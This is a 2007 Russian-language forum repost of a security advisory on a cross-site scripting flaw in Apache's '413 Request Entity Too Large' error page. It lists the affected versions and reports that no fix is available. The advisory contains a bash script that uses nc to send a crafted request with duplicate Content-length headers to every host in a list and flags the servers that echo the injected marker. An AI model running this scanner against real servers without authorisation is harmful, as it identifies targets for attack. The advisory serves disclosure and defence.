Показано с 1 по 1 из 1.

Межсайтовый скриптинг в Apache

  1. #1
    Global Moderator Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для ALEX(XX)
    Регистрация
    31.03.2005
    Адрес
    Чернигов
    Сообщений
    10,777
    Вес репутации
    3704

    Межсайтовый скриптинг в Apache

    03 декабря, 2007

    Программа: Apache 2.2.4, 2.0.46, 2.0.51, 2.0.55, 2.0.59 и 2.2.3, возможно другие ранние версии

    Опасность: Низкая

    Наличие эксплоита: Да

    Описание:
    Уязвимость позволяет удаленному пользователю произвести XSS нападение.
    Уязвимость существует из-за недостаточной обработки входных данных при отображении ошибки "413 Request Entity Too Large". Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта. Пример:

    #!/bin/bash
    # PR07-37-scan
    if [ $# -ne 1 ]
    then
    echo "$0 <hosts-file>"
    exit
    fi
    for i in `cat $1`
    do
    if echo -en "<PROCHECKUP> / HTTP/1.1\nHost: $i\nConnection: close\nContent-length: 0\nContent-length: 0\n\n" | nc -w 4 $i 80 | grep -i '<PROCHECKUP>' > /dev/null
    then
    echo "$i is VULNERABLE!"
    fi
    done

    URL производителя: www.apache.org

    Решение: Способов устранения уязвимости не существует в настоящее время.

    securitylab.ru
    Left home for a few days and look what happens...

  2. Реклама
     

Похожие темы

  1. Межсайтовый скриптинг в Apache Tomcat
    От ALEX(XX) в разделе Уязвимости
    Ответов: 0
    Последнее сообщение: 04.06.2008, 09:15
  2. Межсайтовый скриптинг в Apache mod_imagemap
    От ALEX(XX) в разделе Уязвимости
    Ответов: 0
    Последнее сообщение: 13.12.2007, 20:03
  3. Межсайтовый скриптинг в Apache mod_imap
    От ALEX(XX) в разделе Уязвимости
    Ответов: 0
    Последнее сообщение: 13.12.2007, 19:59
  4. Межсайтовый скриптинг в Apache Tomcat
    От ALEX(XX) в разделе Уязвимости
    Ответов: 0
    Последнее сообщение: 20.06.2007, 08:50
  5. Межсайтовый скриптинг в Apache Tomcat
    От ALEX(XX) в разделе Уязвимости
    Ответов: 0
    Последнее сообщение: 15.06.2007, 12:48

Свернуть/Развернуть Ваши права в разделе

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
  •  
Page generated in 0.00225 seconds with 18 queries